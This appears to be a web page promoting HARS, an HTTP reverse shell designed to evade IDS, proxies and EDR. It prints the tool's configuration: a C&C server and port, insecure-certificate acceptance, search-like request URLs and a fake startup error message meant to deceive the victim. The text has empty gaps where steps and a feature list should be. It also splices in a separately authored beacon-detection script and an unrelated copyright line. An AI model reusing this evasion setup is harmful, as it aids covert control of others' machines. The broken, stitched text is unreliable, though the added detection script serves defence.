There are many ways to create a reverse shell in order to remotely control a machine through a firewall. Indeed, outbound connections are not always filtered.
However, security software and hardware (IPS, IDS, proxies, AV, EDR, etc.) are becoming increasingly capable of detecting these attacks. In most cases, the connection to the reverse shell is established through a TCP or UDP tunnel. I think the best way to avoid detection is to make the traffic look legitimate. HTTP is the protocol most commonly used by ordinary users, and it is almost never filtered, since doing so would block access to websites.
Then:
And so on, until the attacker decides to end the session.
The following features are implemented:
Several configuration parameters can be modified in Config.cs within HARS.sln.
    class Config
    {
        /* Behavior */

        // Display a fake error msg at startup
        public static bool DisplayErrorMsg = true;
        // Title of fake error msg
        public static string ErrorMsgTitle = "This application could not be started.";
        // Description of fake error msg
        public static string ErrorMsgDesc = "Unhandled exception has occured in your application. rr Object {0} is not valid.";
        // Min delay between the client calls
        public static int MinDelay = 2;
        // Max delay between the client calls
        public static int MaxDelay = 5;
        // Fake uri requested - Warning : it must begin with "search" (or need a change on server side)
        public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";

        /* Listener */

        // Hostname/IP of C&C server
        public static string Server = "https://127.0.0.1";
        // Listening port of C&C server
        public static string Port = "443";
        // Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy
        public static bool AllowInsecureCertificate = true;
    }
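From the defender's side, the settings above describe a traffic shape that a proxy log can reveal: one client fetching the same path every few seconds (MinDelay to MaxDelay) with only the trailing query parameter changing. The following is an added example, not part of the original page or of the HARS project: it parses constructed proxy log lines (timestamp, client, method, URL, status; the format and the addresses are assumptions) and flags client/path pairs whose request cadence is short and unusually regular, the way a jittered beacon looks next to ordinary browsing.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log lines (not real traffic). Format assumed here:
# "<ISO timestamp> <client ip> <method> <url> <status>"
# The first client requests the same path every 3-4 s with only cvid changing;
# the second client browses normally.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 GET https://203.0.113.10:443/search?q=search+something&qs=n&form=QBRE&cvid=a1 200
2024-01-01T10:00:03 10.0.0.5 GET https://203.0.113.10:443/search?q=search+something&qs=n&form=QBRE&cvid=a2 200
2024-01-01T10:00:07 10.0.0.5 GET https://203.0.113.10:443/search?q=search+something&qs=n&form=QBRE&cvid=a3 200
2024-01-01T10:00:10 10.0.0.5 GET https://203.0.113.10:443/search?q=search+something&qs=n&form=QBRE&cvid=a4 200
2024-01-01T10:00:14 10.0.0.5 GET https://203.0.113.10:443/search?q=search+something&qs=n&form=QBRE&cvid=a5 200
2024-01-01T10:00:18 10.0.0.5 GET https://203.0.113.10:443/search?q=search+something&qs=n&form=QBRE&cvid=a6 200
2024-01-01T10:00:01 10.0.0.7 GET https://www.example.com/news 200
2024-01-01T10:02:30 10.0.0.7 GET https://www.example.com/news/story-1 200
2024-01-01T10:09:12 10.0.0.7 GET https://www.example.com/search?q=weather 200
2024-01-01T10:15:45 10.0.0.7 GET https://www.example.com/about 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+)$")


def parse_log(text):
    """Parse log lines into (timestamp, client, scheme://host[:port]/path) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the whole run
        ts, client, _method, url, _status = m.groups()
        # Drop the query string: the only thing that varies per beacon is cvid,
        # so grouping on host+path collapses the series into one key.
        host_path = url.split("?", 1)[0]
        events.append((datetime.fromisoformat(ts), client, host_path))
    return events


def find_beacons(events, min_requests=5, max_cv=0.5, max_mean_gap=60.0):
    """Return {(client, host_path): (count, mean_gap_s, cv)} for regular, short-interval series.

    cv is the coefficient of variation of inter-request gaps; human browsing of one
    path is bursty (high cv), a jittered beacon stays in a narrow band (low cv).
    """
    series = defaultdict(list)
    for ts, client, host_path in events:
        series[(client, host_path)].append(ts)

    findings = {}
    for key, stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg == 0:
            continue  # identical timestamps: cannot measure cadence
        cv = pstdev(gaps) / avg
        if avg <= max_mean_gap and cv <= max_cv:
            findings[key] = (len(stamps), avg, cv)
    return findings


if __name__ == "__main__":
    for (client, path), (count, avg, cv) in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{client} -> {path}: {count} requests, mean gap {avg:.1f}s, cv {cv:.2f}")
```

The thresholds are starting points, not tuned values: a short `max_mean_gap` catches the 2 to 5 second cadence configured above, while a larger window and a longer observation period would be needed for slower beacons, at the cost of more benign periodic traffic (update checks, dashboards) entering the candidate set.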
For further documentation, see the project README directly.
Project URL: https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell
Copyright: 深圳市网商在线科技有限公司